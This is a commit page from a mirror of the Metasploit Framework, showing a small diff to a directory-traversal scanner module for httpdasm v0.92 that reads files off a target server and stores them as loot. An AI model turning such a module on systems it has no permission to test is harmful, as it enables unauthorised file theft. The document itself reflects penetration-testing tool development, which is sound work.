infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

made suggested changes to module

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-06-19 12:22:44 -05:00
parent b78bb78f95
commit a0189cc3f6
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 4 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
View File

@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
super(update_info(info,
'Name' => 'Httpdasm Directory Traversal',
'Description' => %q{
Exploits a directory traversal vulnerability to read files from server running httpdasm v0.92.
This module allows for traversing the file system of a host running httpdasm v0.92.
},
'Author' =>
[
@ -33,17 +33,16 @@ class MetasploitModule < Msf::Auxiliary
end
def run
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri)
'uri' => normalize_uri(target_uri.path)
})
if res && res.code == 200
print_status(res.body)
path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
else
print_error("Timeout")
end
print_error("404 error")
end
end
end